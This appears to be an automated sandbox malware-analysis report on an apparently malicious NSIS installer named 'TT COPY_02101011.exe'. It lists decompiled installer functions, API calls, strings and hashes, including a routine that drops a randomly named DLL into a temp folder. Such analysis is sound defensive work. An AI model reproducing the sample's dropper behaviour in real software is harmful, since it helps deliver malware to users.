                                                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
                                                				if(_t7 != 0) {
                                                					CloseHandle(_v20.hThread);
                                                					return _v20.hProcess;
                                                				}
                                                				return _t7;
                                                			}






                                                APIs
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                                                • CloseHandle.KERNEL32(?), ref: 004051BD
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                                • Error launching installer, xrefs: 0040519E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                • API String ID: 3712363035-1785902839
                                                • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                                • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegCloseKey.ADVAPI32(?), ref: 10002B5B
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 10002B67
                                                • HeapFree.KERNEL32(00000000), ref: 10002B6E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Heap$CloseFreeProcess
                                                • String ID: destroying %p
                                                • API String ID: 1203615452-3738993722
                                                • Opcode ID: a9117b934fdd6baba2089d809751436a3f0a9d21eb35b021bf9818c1e2a4741f
                                                • Instruction ID: 3ede338f41f121cd3867df338115b91863fcfafaa1bef59c7fa54537ab628b1b
                                                • Opcode Fuzzy Hash: a9117b934fdd6baba2089d809751436a3f0a9d21eb35b021bf9818c1e2a4741f
                                                • Instruction Fuzzy Hash: F2E04CB9510218AFE701DFA4DC89EEA3BACEB4D755F448004FA0D8B251D675E9818BB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040541E(CHAR* _a4) {
                                                				CHAR* _t7;
                                                
                                                				_t7 = _a4;
                                                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                					lstrcatA(_t7, 0x40900c);
                                                				}
                                                				return _t7;
                                                			}





                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                                                • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3081826266
                                                • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                                • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100109B6
                                                • __isleadbyte_l.LIBCMT ref: 100109E4
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010A12
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: a326ccb4c208bbd1b9aa08ea66356f62ea223fb5d1eaf7516e4ce7748e9165e0
                                                • Instruction ID: 380745b120e2b0fca2f12d2c353f88ae8ead66a6f5b6c000cf70b8cda04ad6f7
                                                • Opcode Fuzzy Hash: a326ccb4c208bbd1b9aa08ea66356f62ea223fb5d1eaf7516e4ce7748e9165e0
                                                • Instruction Fuzzy Hash: AE319C3170024AEFEB11CE60CC45BAA7BF9FF41290F164129F8959B191E7B1E8D0DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                                				char* _t18;
                                                				int _t19;
                                                				void* _t30;
                                                
                                                				_t18 = E004029E8(0xffffffee);
                                                				 *(_t30 - 0x2c) = _t18;
                                                				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                				 *__esi = __ebx;
                                                				 *(_t30 - 8) = _t19;
                                                				 *__edi = __ebx;
                                                				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                				if(_t19 != __ebx) {
                                                					__eax = GlobalAlloc(0x40, __eax);
                                                					 *(__ebp + 8) = __eax;
                                                					if(__eax != __ebx) {
                                                						if(__eax != 0) {
                                                							__ebp - 0x44 = __ebp - 0x34;
                                                							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                                                								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                							}
                                                						}
                                                						_push( *(__ebp + 8));
                                                						GlobalFree();
                                                					}
                                                				}
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                                				return 0;
                                                			}







                                                APIs
                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                                  • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 1404258612-0
                                                • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                                • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004054B2(char _a4) {
                                                				CHAR* _t3;
                                                				char* _t5;
                                                				CHAR* _t7;
                                                				CHAR* _t8;
                                                				void* _t10;
                                                
                                                				_t1 =  &_a4; // 0x405264
                                                				_t8 =  *_t1;
                                                				_t7 = CharNextA(_t8);
                                                				_t3 = CharNextA(_t7);
                                                				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                					if( *_t8 != 0x5c5c) {
                                                						L8:
                                                						return 0;
                                                					}
                                                					_t10 = 2;
                                                					while(1) {
                                                						_t10 = _t10 - 1;
                                                						_t5 = E00405449(_t3, 0x5c);
                                                						if( *_t5 == 0) {
                                                							goto L8;
                                                						}
                                                						_t3 = _t5 + 1;
                                                						if(_t10 != 0) {
                                                							continue;
                                                						}
                                                						return _t3;
                                                					}
                                                					goto L8;
                                                				} else {
                                                					return CharNextA(_t3);
                                                				}
                                                			}









                                                APIs
                                                • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004054C0
                                                • CharNextA.USER32(00000000), ref: 004054C5
                                                • CharNextA.USER32(00000000), ref: 004054D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: dR@
                                                • API String ID: 3213498283-1322173608
                                                • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                                • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E00401D1B() {
                                                				void* __esi;
                                                				int _t6;
                                                				signed char _t11;
                                                				struct HFONT__* _t14;
                                                				void* _t18;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t28;
                                                
                                                				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                                				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                                                				 *0x40af8c = E004029CB(3);
                                                				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                				 *0x40af93 = 1;
                                                				 *0x40af90 = _t11 & 0x00000001;
                                                				 *0x40af91 = _t11 & 0x00000002;
                                                				 *0x40af92 = _t11 & 0x00000004;
                                                				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
                                                				_t14 = CreateFontIndirectA(0x40af7c);
                                                				_push(_t14);
                                                				_push(_t26);
                                                				E00405889();
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
                                                				return 0;
                                                			}












                                                APIs
                                                • GetDC.USER32(?), ref: 00401D22
                                                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirect
                                                • String ID:
                                                • API String ID: 3272661963-0
                                                • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                                                • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __fltout2.LIBCMT ref: 1001552B
                                                  • Part of subcall function 1001677F: ___dtold.LIBCMT ref: 100167A3
                                                  • Part of subcall function 1001677F: _$I10_OUTPUT.LIBCMT ref: 100167BE
                                                  • Part of subcall function 1000ECAB: __getptd_noexit.LIBCMT ref: 1000ECAB
                                                • __fptostr.LIBCMT ref: 10015593
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: I10____dtold__fltout2__fptostr__getptd_noexit
                                                • String ID: -
                                                • API String ID: 2971678636-2547889144
                                                • Opcode ID: d2959434b4653bb3086d598e208e7bc33a13d8b391fecff10b1ccb2c29e8e395
                                                • Instruction ID: c9c910acf0cea897d6e0f6e61f9ea18633ec71ab2fd0a5864193f4efefa41320
                                                • Opcode Fuzzy Hash: d2959434b4653bb3086d598e208e7bc33a13d8b391fecff10b1ccb2c29e8e395
                                                • Instruction Fuzzy Hash: 11212D77A00109DBDB15DF79CC559EF7B6ADF08260F054139F815AF140EA71E94087A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: (%p) %s %p %p$(%p) Unhandled Sink: %s
                                                • API String ID: 2931989736-219090540
                                                • Opcode ID: 3de1567bfd49f930e144c12078b021153c5538351b17d8b74515e471fdcd336c
                                                • Instruction ID: d19d2395c853d5f776270e7cc75a341a2d5bd54c68d9f578bd5695b489a62aac
                                                • Opcode Fuzzy Hash: 3de1567bfd49f930e144c12078b021153c5538351b17d8b74515e471fdcd336c
                                                • Instruction Fuzzy Hash: 861158F9D00108BBEB10DE94DD46FAE33A8DB44344F108128FD095B246E675EA94DB72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				long _t22;
                                                
                                                				if(_a8 != 0x102) {
                                                					if(_a8 != 0x200) {
                                                						_t22 = _a16;
                                                						L7:
                                                						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
                                                							 *0x429fc0 = _t22;
                                                							E0040592B(0x429fd8, 0x42f000);
                                                							E00405889(0x42f000, _t22);
                                                							E0040140B(6);
                                                							E0040592B(0x42f000, 0x429fd8);
                                                						}
                                                						L11:
                                                						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t22 = _a16;
                                                						goto L11;
                                                					}
                                                					_t22 = E00404598(_a4, 1);
                                                					_a8 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E00403D29(0x413);
                                                				return 0;
                                                			}





                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404C4F
                                                • CallWindowProcA.USER32 ref: 00404CBD
                                                  • Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                                • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • unsupported interface: %s, xrefs: 10002F65
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: unsupported interface: %s
                                                • API String ID: 2931989736-1937909893
                                                • Opcode ID: 0bbed91d44bfca9cc95a09e59af54bd13ed5d8668a07c598eebc12532b32b5fc
                                                • Instruction ID: 756ccb4e3c111b8c8e4908a39a05004d930757dff1ded9d2ad15e678158e6c47
                                                • Opcode Fuzzy Hash: 0bbed91d44bfca9cc95a09e59af54bd13ed5d8668a07c598eebc12532b32b5fc
                                                • Instruction Fuzzy Hash: 49112AB9900209AFEB00DF60DC45FAE77B5EB48380F108478F9199B385D671EA90CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • unsupported interface: %s, xrefs: 10002C05
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: unsupported interface: %s
                                                • API String ID: 2931989736-1937909893
                                                • Opcode ID: e506a027125c8b6d05b04aff437e9a7864523052f3fd6083d7d3a6c8970f50ca
                                                • Instruction ID: 05601d2df3204a6978084df65b63404ceb97135f502289257fd2f71aa67c2633
                                                • Opcode Fuzzy Hash: e506a027125c8b6d05b04aff437e9a7864523052f3fd6083d7d3a6c8970f50ca
                                                • Instruction Fuzzy Hash: 81112AB9D00208ABEB00DF64DC46FEE77A4EB49380F108468F9095B345E775EA94CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                				int _t5;
                                                				long _t7;
                                                				struct _OVERLAPPED* _t11;
                                                				intOrPtr* _t15;
                                                				void* _t17;
                                                				int _t21;
                                                
                                                				_t15 = __esi;
                                                				_t11 = __ebx;
                                                				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                					_t7 = lstrlenA(E004029E8(0x11));
                                                				} else {
                                                					E004029CB(1);
                                                					 *0x409f78 = __al;
                                                				}
                                                				if( *_t15 == _t11) {
                                                					L8:
                                                					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                				} else {
                                                					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll", _t7, _t17 + 8, _t11);
                                                					_t21 = _t5;
                                                					if(_t21 == 0) {
                                                						goto L8;
                                                					}
                                                				}
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
                                                				return 0;
                                                			}










                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll, xrefs: 004024BC, 004024E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FileWritelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll
                                                • API String ID: 427699356-2834972675
                                                • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                                                • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405465(char* _a4) {
                                                				char* _t3;
                                                				char* _t5;
                                                
                                                				_t5 = _a4;
                                                				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                				while( *_t3 != 0x5c) {
                                                					_t3 = CharPrevA(_t5, _t3);
                                                					if(_t3 > _t5) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				 *_t3 =  *_t3 & 0x00000000;
                                                				return  &(_t3[1]);
                                                			}






                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT COPY_02101011.exe,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 0040546B
                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT COPY_02101011.exe,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00405479
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-224404859
                                                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                                                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405577(CHAR* _a4, CHAR* _a8) {
                                                				int _t10;
                                                				int _t15;
                                                				CHAR* _t16;
                                                
                                                				_t15 = lstrlenA(_a8);
                                                				_t16 = _a4;
                                                				while(lstrlenA(_t16) >= _t15) {
                                                					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                					_t10 = lstrcmpiA(_t16, _a8);
                                                					if(_t10 == 0) {
                                                						return _t16;
                                                					}
                                                					_t16 = CharNextA(_t16);
                                                				}
                                                				return 0;
                                                			}







                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
